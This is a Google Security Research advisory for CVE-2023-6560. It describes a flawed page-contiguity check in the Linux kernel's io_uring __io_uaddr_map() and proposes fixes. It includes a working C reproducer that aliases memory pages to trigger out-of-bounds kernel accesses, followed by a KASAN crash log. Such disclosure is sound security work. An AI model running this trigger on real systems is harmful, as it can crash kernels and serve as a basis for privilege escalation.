
io_uring __io_uaddr_map() Dangerous Multi-Page Handling
Posted Jan 8, 2024
Authored by Jann Horn, Google Security Research

__io_uaddr_map() in io_uring suffers from dangerous handling of multi-page regions.

tags | exploit
advisories | CVE-2023-6560
SHA-256 | 36027428c2c544777c9a58e5240c8a00ac64b96a28b3c1c2a02ca9c040ca0b42

io_uring: __io_uaddr_map() handles multi-page region dangerously

__io_uaddr_map() wants to import a region from userspace, and then address the
imported region through the linear mapping area. This requires that the
imported region is physically contiguous.
A comment in __io_uaddr_map() explains that the imported region is usually
just a single page, in which case that is trivially fine.
However, __io_uaddr_map() also has code intended to permit multi-page regions,
in which case it tries to enforce that the entire region maps to the same
folio (in other words, the same head page):

	/*
	 * Should be a single page. If the ring is small enough that we can
	 * use a normal page, that is fine. If we need multiple pages, then
	 * userspace should use a huge page. That's the only way to guarantee
	 * that we get contigious memory, outside of just being lucky or
	 * (currently) having low memory fragmentation.
	 */
	if (page_array[0] != page_array[ret - 1])
		goto err;

This code is wrong for (more or less) two reasons:

1. It only checks the first and last page; it doesn't check any of the pages
in between. Userspace can easily create a set of adjacent VMAs such that
the first and last virtual page map to the same physical page, while pages
in between map to entirely unrelated pages.
2. It misunderstands how compound pages are represented in the kernel, and
will always reject the case it is supposed to allow:
`pin_user_pages_fast()` would return a set of adjacent `struct page`
instances that are associated with the same head page / folio; it
wouldn't return the same `struct page *` for every subpage.
Every chunk of memory of size `PAGE_SIZE` maps to its own `struct page` (see the sketch right below).
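
For illustration, here is a minimal sketch of what the intended condition would actually have to verify; `io_pages_contiguous()` is an invented helper name and this is not the upstream patch. Since `pin_user_pages_fast()` fills `page_array[]` with a distinct `struct page *` for every `PAGE_SIZE` chunk, the check has to walk all entries and compare folios / page frame numbers instead of just the first and last pointer:

```
#include <linux/mm.h>

/*
 * Hypothetical sketch, not the actual kernel fix: require that the whole
 * pinned range is one physically contiguous run backed by a single folio.
 * Even for a huge-page-backed region, page_array[] contains nr_pages
 * different struct page pointers (one per PAGE_SIZE chunk), so every
 * entry has to be checked.
 */
static bool io_pages_contiguous(struct page **page_array, int nr_pages)
{
	struct folio *folio = page_folio(page_array[0]);
	int i;

	for (i = 1; i < nr_pages; i++) {
		/* all subpages must belong to the same folio ... */
		if (page_folio(page_array[i]) != folio)
			return false;
		/* ... and must be physically adjacent */
		if (page_to_pfn(page_array[i]) !=
		    page_to_pfn(page_array[i - 1]) + 1)
			return false;
	}
	return true;
}
```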

So if the buggy check above is presented with a userspace region of the following shape,
containing individual 4K pages:

[page A]
[page B]
[...]
[page A]

then it will accept the region and assume that `page_to_virt(<page A>)`
returns the address of a page as big as the entire region. Accesses to the
first 4KiB of the region would work as intended; but accesses to later parts
of the region will be out-of-bounds accesses to unrelated pages.


Here's a reproducer that submits a bunch of NOP ops (zeroed sqes) until it
overruns the end of the first sq page:

```
#define _GNU_SOURCE
#include <unistd.h>
#include <err.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <linux/io_uring.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

#define NUM_SQ_PAGES 4

int main(void) {
  int memfd_sq = SYSCHK(memfd_create("", 0));
  int memfd_cq = SYSCHK(memfd_create("", 0));
  SYSCHK(ftruncate(memfd_sq, NUM_SQ_PAGES * 0x1000));
  SYSCHK(ftruncate(memfd_cq, NUM_SQ_PAGES * 0x1000));

  // sq: map the memfd's first page again over the last page of the region,
  // so the first and last virtual pages alias the same physical page
  void *sq_data = SYSCHK(mmap(NULL, NUM_SQ_PAGES*0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, memfd_sq, 0));
  SYSCHK(mmap(sq_data+(NUM_SQ_PAGES-1)*0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, memfd_sq, 0));

  // cq (rings): alias every later page to the memfd's first page
  void *cq_data = SYSCHK(mmap(NULL, NUM_SQ_PAGES*0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, memfd_cq, 0));
  *(volatile unsigned int *)(cq_data+4) = 64 * NUM_SQ_PAGES;
  for (int i=1; i<NUM_SQ_PAGES; i++)
    SYSCHK(mmap(cq_data+i*0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, memfd_cq, 0));

  struct io_uring_params params = {
    .flags = IORING_SETUP_NO_MMAP | IORING_SETUP_NO_SQARRAY /*| IORING_SETUP_CQE32*/,
    .sq_off = {
      .user_addr = (unsigned long)sq_data
    },
    .cq_off = {
      .user_addr = (unsigned long)cq_data
    }
  };
  int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/64 * NUM_SQ_PAGES, &params));
  printf("uring_fd = %d\n", uring_fd);

  /* submit nops */
  int enter_res = SYSCHK(syscall(__NR_io_uring_enter, uring_fd, 64 * NUM_SQ_PAGES, 0, 0, NULL));
  printf("enter returned %d\n", enter_res);
}
```

Running it on a kernel built with KASAN gives a splat like the one below. Note that the "slab-use-after-free" diagnosis is misleading: the actual bug is a page-level out-of-bounds access, which KASAN can't attribute properly; the report just describes whatever happens to occupy the neighboring page.

```
[ 73.380288] ==================================================================
[ 73.381745] BUG: KASAN: slab-use-after-free in io_submit_sqes+0x223/0xc00
[ 73.382822] Read of size 1 at addr ffff88810263a000 by task uring-multipage/708
[ 73.383967]
[ 73.384240] CPU: 6 PID: 708 Comm: uring-multipage Not tainted 6.7.0-rc2 #357
[ 73.385316] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
[ 73.386778] Call Trace:
[ 73.387177] <TASK>
[ 73.387520] dump_stack_lvl+0x4a/0x80
[ 73.388117] print_report+0xcf/0x670
[...]
[ 73.389595] kasan_report+0xd8/0x110
[...]
[ 73.391954] io_submit_sqes+0x223/0xc00
[ 73.392570] __do_sys_io_uring_enter+0x965/0x1200
[...]
[ 73.397438] do_syscall_64+0x46/0xf0
[ 73.398004] entry_SYSCALL_64_after_hwframe+0x6e/0x76
[ 73.398787] RIP: 0033:0x7ff8ed2e7989
[ 73.399494] Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d d7 64 0c 00 f7 d8 64 89 01 48
[ 73.402164] RSP: 002b:00007fff76dc3598 EFLAGS: 00000202 ORIG_RAX: 00000000000001aa
[ 73.403277] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff8ed2e7989
[ 73.404314] RDX: 0000000000000000 RSI: 0000000000000100 RDI: 0000000000000005
[ 73.411155] RBP: 00007fff76dc3690 R08: 0000000000000000 R09: 0000020000000100
[ 73.412496] R10: 0000000000000000 R11: 0000000000000202 R12: 000055967f6680a0
[ 73.417987] R13: 00007fff76dc3770 R14: 0000000000000000 R15: 0000000000000000
[ 73.419272] </TASK>
[removed irrelevant alloc/free traces of the accessed memory region]
[ 73.449202]
[ 73.449471] The buggy address belongs to the object at ffff88810263a000
[ 73.449471] which belongs to the cache kmalloc-128 of size 128
[ 73.451228] The buggy address is located 0 bytes inside of
[ 73.451228] freed 128-byte region [ffff88810263a000, ffff88810263a080)
[ 73.453173]
[ 73.453429] The buggy address belongs to the physical page:
[ 73.454232] page:000000002be796b3 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10263a
[ 73.455535] head:000000002be796b3 order:1 entire_mapcount:0 nr_pages_mapped:0 pincount:0
[ 73.456662] flags: 0x200000000000840(slab|head|node=0|zone=2)
[ 73.457522] page_type: 0xffffffff()
[ 73.458045] raw: 0200000000000840 ffff8881000428c0 ffffea0004747e80 0000000000000002
[ 73.459143] raw: 0000000000000000 0000000080200020 00000001ffffffff 0000000000000000
[ 73.460305] page dumped because: kasan: bad access detected
[ 73.461091]
[ 73.461353] Memory state around the buggy address:
[ 73.462038] ffff888102639f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 73.463058] ffff888102639f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 73.464277] >ffff88810263a000: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 73.465289] ^
[ 73.465791] ffff88810263a080: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 73.466795] ffff88810263a100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
```

I'm not sure about the best way to fix it. Since the compound page support
can't actually have worked, as explained above, maybe it's easiest to just
drop support for compound pages? Or alternatively we could fix that, but since
nobody seems to have used it, that might be unnecessary complexity...
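
To make the first of those options concrete, here is a hedged sketch (not the actual upstream change) of what "just drop support for multi-page regions" would look like at the site of the broken check, reusing the `ret` page count from the quoted code:

```
	/*
	 * Hypothetical sketch of the "drop multi-page support" option:
	 * only accept regions that pin exactly one page, instead of trying
	 * to prove that a larger region is physically contiguous. The
	 * alternative would be a full walk over page_array[], along the
	 * lines of the io_pages_contiguous() sketch earlier in this report.
	 */
	if (ret != 1)
		goto err;
```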


This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2024-02-22.

Related CVE Numbers: CVE-2023-6560.



Found by: jannh@google.com
